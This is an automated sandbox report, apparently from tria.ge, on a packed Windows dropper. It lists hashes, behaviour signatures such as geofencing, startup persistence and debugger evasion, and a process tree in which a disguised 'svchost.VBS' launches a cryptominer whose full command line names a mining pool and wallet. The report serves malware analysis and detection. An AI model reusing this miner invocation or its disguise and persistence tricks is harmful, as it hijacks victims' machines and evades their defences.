Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    145s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/05/2024, 15:06

General

  • Target

    876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe

  • Size

    1.6MB

  • MD5

    876cf2c8f925c3a8a29d254f34ca1d0d

  • SHA1

    b6e4acdc4fa514a9d879878249c223e946114e09

  • SHA256

    a65d885d904cc0f2d2452d4c2b8c58db5eb04153e45a3ce081d3f50d767e5e22

  • SHA512

    25fce95c3722da3bc992762f2ba79db2e966870c0b11cc4701a7e1fc66f9c75da34f8521e70e01e518141edb6949c6a1a754520a03292f857629825fdefa78ee

  • SSDEEP

    49152:Ae6wBw10h/e9uUdu7XUIvoMoSzxWTnHGQvPM/9Dft:AeD9WuvtY7pHMD

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • VMProtect packed file 4 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\876cf2c8f925c3a8a29d254f34ca1d0d_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Drops startup file
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:4568
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\Windows\svchost.VBS"
      2⤵
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\ProgramData\Windows\csrs.exe
        "C:\ProgramData\Windows\csrs.exe" -o stratum+tcp://cryptonight.eu.nicehash.com:3355 -u 19e8n98DfHt3un2eEQuYCZGron5z3dBZiZ -p x -t 10
        3⤵
        • Executes dropped EXE
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of AdjustPrivilegeToken
        PID:3544

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    1KB

    MD5

    64f8f6eac3dc0c9fedff18d20aab3e44

    SHA1

    2a8a993f40c3feb053cf80cffb630315cd242342

    SHA256

    ff91c76c8c2e0e3d30431e522c07e27295376b565480748d1e0e7f2641af6d3e

    SHA512

    5d6810fb3b56eab08617338cb21791322a5aeb0f517b59bd8c7bbd2ad06f01903c551fa07dd35c252334d70eadebf24239669691eb10bf4b77d4ef23e9688116

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    3KB

    MD5

    de7c2fd6410b41fe9dc691128bda00f0

    SHA1

    62412cf8b84f29be852cdf710b694af924f4345c

    SHA256

    fad402a54293e23785c2f44cdb22dc86c8d60d83a574bc53ce56442ad14fd68d

    SHA512

    df625533f850a2c97f6464540d03b632312472415eb590099ea8a63a4769f8efac70b5c035ad32b3897259a4cfb2580704b8d600997a9af53c772845a96c6e0f

  • C:\ProgramData\Windows\1717168022_log.txt

    Filesize

    4KB

    MD5

    3217480c90b0366a3621c70ee2f50585

    SHA1

    60f759c3fc66312dd7a596732a34920e2d600874

    SHA256

    f437e4d76784bb3281e7f03e15d3154ecc9429cc2b801272f662a4521f1ea78d

    SHA512

    a9f6d57db9de37b876ae7e2e629e4abe7bd141999f0bcd4976411ec0bd9170b8c92b8c0b8b8aa8445bafbecf4ac201bc498321bf196c38095a9834bdad9663a7

  • C:\ProgramData\Windows\csrs.exe

    Filesize

    1.4MB

    MD5

    e3427d9f439aebefa3d9c299e2a94af3

    SHA1

    ffff4672790378677ec30d3634fc593c10dfd37e

    SHA256

    7374051e75ae97ba687cd153927faccd21fcdcc0b41a42867d38ac62064f6aba

    SHA512

    a9ffc1a3436a26b162b8933f628b6f5014b7cd5678625a479ddf6ad0ff32a50b916c2041265fa0fc6cc99fcf0c63e30eb4811cf8099cc0baf2b718647ce4160b

  • C:\ProgramData\Windows\svchost.vbs

    Filesize

    1KB

    MD5

    96d540f4b7c1b7074e5f135432a3592d

    SHA1

    c380a1b024dcb58296a30c258d294ca3249d6f08

    SHA256

    44af45c732ab1f051e9c849086af7384c78fe7faaa2049c844b3b014a5af5e70

    SHA512

    d3589dff318c752a3913fd489f3a1c6b6e1898f051d97cb6e546d3d4a8339732992705eaa1af27d29e8c41eb7a229ea597df406be5a312d2070226f503be514b

  • memory/3544-11-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB

  • memory/3544-12-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB

  • memory/3544-31-0x0000000000090000-0x00000000003FB000-memory.dmp

    Filesize

    3.4MB